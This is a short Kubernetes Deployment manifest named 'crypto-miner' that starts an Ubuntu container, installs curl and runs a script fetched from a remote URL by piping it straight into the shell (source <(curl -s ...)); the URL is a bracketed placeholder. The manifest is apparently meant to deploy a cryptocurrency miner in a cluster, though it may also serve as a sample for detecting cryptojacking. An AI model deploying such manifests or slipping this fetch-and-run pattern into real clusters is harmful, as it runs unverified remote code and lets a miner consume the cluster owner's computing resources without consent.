apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: crypto-miner
  name: crypto-miner
spec:
  replicas: 1
  selector:
    matchLabels:
      app: crypto-miner
  template:
    metadata:
      labels:
        app: crypto-miner
    spec:
      containers:
      - image: ubuntu:latest
        name: crypto-miner
        resources:
          limits:
            cpu: "1"
        command: ["/bin/bash"]
        args: ['-c', 'apt-get update ; apt-get install -y curl ; source <(curl -s http://[URL][wrapper script])' ]
